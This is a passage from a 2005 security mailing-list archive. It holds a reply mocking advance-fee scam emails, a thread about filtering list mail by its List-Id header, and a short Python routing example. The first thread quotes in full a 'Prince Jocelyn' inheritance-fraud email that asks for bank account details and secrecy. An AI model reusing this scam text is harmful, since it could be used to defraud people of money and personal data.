Hi:

I have a couple of stories to tell about this.

Jejej I have even interchanged mail with those guys doing that. Do the following. If they are a prince or a king or a president or whoever wants to give you millions, jejej, tell them to pay you the airplane ticket, that you have no money at all. Jajaja it is only a couple of thousands that compared to a million is nothing. If they do, jeje, you take a free vacation. Believe me, you will receive an excuse. The intention behind those mails is to steal your money by getting your data and making someone similar to you, for instance, make bank transactions etc. Beware, in such case you could later become a problem that needs to be eradicated, so by all means never give your personal data. When you find someone owning a fortune, believe me, it is worth it to do that. They ask for personal information as well as pictures of you. You could even follow them with the game and give them fake pictures or fake data.

I remember that once one of them said he was from my country. Jejej instead of a message in English I made the guy translate the mail if he wanted to answer me. And he/she did and also investigated. He complained about the language, that he had left the country a long time ago. Jajajaj it was very funny to look at him/her making mistakes. Finally he/she gave up with me.

Another one also told me to scan my passport and later to send it using a fax or e-mail. Jejej I told him that I didn't have one and that I didn't have the money to get it, that if he could send me that it was all right. I received an excuse and never knew about that guy again.


Regards
Waldo Alvarez
On 8/24/05, winsoc [EMAIL PROTECTED] wrote:
> Hi,
>
> has anyone else received this? I seriously cannot believe that someone would be so mundane in thinking that people would reply to this.
>
> QUOTE :
>
> -----Original Message-----
> From: prince josey [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, August 24, 2005 4:11 AM
> Subject: - TREAT AS URGENT -
>
> ATTN: Dear Friend,
>
> How are you doing with your family? I presume that all is well with you. I am Prince Jocelyn, the manager of audit and accounting department (La Banque De L'Afrique) Ouagadougou, Burkina Faso. I got your contact from the international business directory when i was searching a foreigner who will assist me in a profitable business deal that will yield us life success. Before I wrote you, I prayed that you will be a honest and reliable person whom i can work with to achieve this deal of our life.
>
> From my section in the bank, I discovered an abandoned sum of FOURTEEN MILLION UNITED STATES DOLLARS ($USD14M) that belongs to one of our customer who died along with his entire families, on 25TH JULY, 2000 CONCORDE PLANE CRASH [Flight AF4590] with the whole passengers on board. The name of the deceased man was (MR. ANDREAS SCHRANNER from Munich, Germany. You have to understand that I come across this huge amount of fund when i was balancing an Internal Audit account of the departmental customers file to submit to the bank management for the annual audit of the year.
>
> Since the bank got information about the death of the deceased man, the bank have been expecting his next of kin to apply and claim this fund because the bank cannot release the fund to any a person unless a foreigner apply for the transfer of the fund as the next of kin or relation to the deceased relating to this inheritance, but unfortunately i learnt through investigations that no one has come up for the claim. This is the reason why I am making this business proposal to you so that you will apply to the bank for them to wire this fund to your nominated account as the next of kin or relation to the deceased customer.
>
> For us to achieve this business immediately, the percentage ratio for sharing the fund when the bank release the fund for you must be arranged accordingly upon your confirmation of your intent. Thereafter I will visit your country for sharing modalities of percentages indicated above. So for the immediate transfer of this fund into your bank account as arranged, you must apply first to the bank as the only existing next of kin to the deceased customer by indicating in the application the bank account information where you will request the bank to wire the fund. So if you accept to help me in order to achieve this great business, i will send to you through email or by fax an application form of claim which you will fill with your account information and send to the bank for the transaction to start immediately.
>
> Please i would like you to know the following information.
>
> (1.) This business is completely free from risk while your personality and reputation will be protected.
> (2.) You will not face any circumstances beyond our control because the application will bear the brief information of the deceased which the bank may like to know.
> (3.) If you will follow my directives, this transaction will be completed within a short time.
> (4.) You should keep this business CONFIDENTIAL or SECRET until the completion of this deal.
>
> Please contact me through my email address

Re: [Full-disclosure] Off topic. To the list Admins or anyone that can help me

2005-08-20 Thread wac
Hi ppl:

Thanks to all those that tried to help me. I just can't read that much
mail. But thanks to almost all responses (except the ironic one, please
save us both some time next time).

Since most answers are like this one I'll use this as reply (sorry
folks, I guess this is the most optimized way for me to answer all of
your mails ;) ). But I guess this needs to be pointed out in order
to make the list better for everyone.

On 8/20/05, Cory Stoker [EMAIL PROTECTED] wrote:
> Hello Waldo:
>
> I do not have a GMail account so I do not know if this is possible but I
> filter this list by using the List-Id header in email.  All messages
> sent to the full-disclosure mailing list will have the List-Id
> header set to: An unmoderated mailing list for the discussion of
> security issues full-disclosure.lists.grok.org.uk.  Of this I make
> sure that full-disclosure.lists.grok.org.uk is in the header.
> This makes it easier than filtering on to:, from:, or subject.  To
> view headers for a mail, I would see if there is an option to view
> all headers in your respective email client.  Of course if it is
> webmail this could not be an option.
>
> Hope this helps...

The gmail filters are:

From
To
Subject
Has the words
Doesn't Have

Yep, stuff for the masses is simple. I bet I'm not the only one with
these simplicity problems ;(

I suggest that it would be good to make it configurable on the list
server if you want modified Froms or not (so people that do not
like that can be happy too). Would that be possible? I mean without
much trouble for the admins. I guess it would be a good feature for
the list that would help some ppl that have to deal with webmails and
similar. I guess one solution for my problems could be to use the
project at SourceForge similar to YahooPOPs but for gmail (I don't
remember the exact name). Maybe that solves things for my desktop but
then what if I'm not at my desktop. I receive hundreds of mails
every day from several lists so leaving them unsorted in gmail is a no
no since that takes away your productivity. On the other side I can't
install or execute some software on every computer I land on.

Thanks again to everyone
Regards
Waldo Alvarez


> Thanks,
>
> -Cory
>
> On Aug 19, 2005, at 7:15 PM, waldo alvarez wrote:
>
> > Hi Folks:
> >
> > I just landed here recently because of an e-mail in bugtraq. You
> > know curiosity can take you to strange places. And jejej this list is
> > great. Non moderation simply makes it great. Now the problem is. I
> > sort mail arriving to my mailbox by category using filters. Now the
> > only common thing that applies to all mails here is the
> > [Full-disclosure] text in the subject. Everything else is a chaos. The
> > from fields sometimes don't have the fulldisclosure address. And on
> > the other side I tried to sort using that text in the subject but it
> > doesn't work at all: sometimes messages land in the Fulldisclosure
> > folder I have for this list but sometimes they land straight into my
> > inbox. And there is a total chaos having so much traffic this list.
> > Could anybody that solved this before gimme a hand telling me the
> > solution for this. In any case I think this list should work in that
> > sense like the rest of the lists.
> >
> > Thanks in advance
> > Waldo Alvarez

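The List-Id approach from Cory's reply, worked through as an added example (not code from either poster): three constructed messages (addresses and bodies made up) are routed once by the subject tag Waldo was filtering on and once by the List-Id header, which is parsed the RFC 2919 way, dropping the descriptive phrase and angle brackets and joining folded lines.

```python
import email
import re
from email import policy

LIST_ID = "full-disclosure.lists.grok.org.uk"
SUBJECT_TAG = "[Full-disclosure]"
LIST_FOLDER = "Fulldisclosure"
INBOX = "INBOX"

# Constructed samples: made-up addresses, not real list traffic.
# A normal post: tag in the subject, List-Id folded over two lines.
NORMAL = """\
From: alice@example.invalid
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Is this a Virus?
List-Id: An unmoderated mailing list for the discussion of
 security issues <full-disclosure.lists.grok.org.uk>

Body of a normal list post.
"""

# A reply whose mail client rewrote the subject and lost the tag,
# the case that lands in the inbox with a subject-only filter.
TAG_DROPPED = """\
From: bob@example.invalid
To: full-disclosure@lists.grok.org.uk
Subject: Re: Is this a Virus?
List-Id: <full-disclosure.lists.grok.org.uk>

A reply whose mail client dropped the subject tag.
"""

# A private reply that kept the tag but never went through the list.
OFF_LIST = """\
From: carol@example.invalid
To: waldo@example.invalid
Subject: Re: [Full-disclosure] Is this a Virus?

A private reply sent directly, not via the list server.
"""


def list_id_of(msg):
    """Bare list identifier from the List-Id header (RFC 2919), or None.

    The header may carry a free-text phrase before the <id> and may be
    folded; policy.default unfolds it before we see the value."""
    value = msg.get("List-Id")
    if value is None:
        return None
    m = re.search(r"<([^>]+)>", value)
    return (m.group(1) if m else value).strip().lower()


def route_by_list_id(raw):
    """Folder chosen from the List-Id header alone."""
    msg = email.message_from_string(raw, policy=policy.default)
    return LIST_FOLDER if list_id_of(msg) == LIST_ID else INBOX


def route_by_subject(raw):
    """Folder chosen from the subject tag alone (Waldo's original filter)."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = (msg.get("Subject") or "").lower()
    return LIST_FOLDER if SUBJECT_TAG.lower() in subject else INBOX


def compare(samples):
    """(name, subject-based folder, List-Id-based folder) for each sample."""
    return [(name, route_by_subject(raw), route_by_list_id(raw)) for name, raw in samples]


if __name__ == "__main__":
    for name, by_subject, by_list_id in compare(
        [("normal", NORMAL), ("tag_dropped", TAG_DROPPED), ("off_list", OFF_LIST)]
    ):
        print("%-12s subject-filter=%-14s list-id-filter=%s" % (name, by_subject, by_list_id))
```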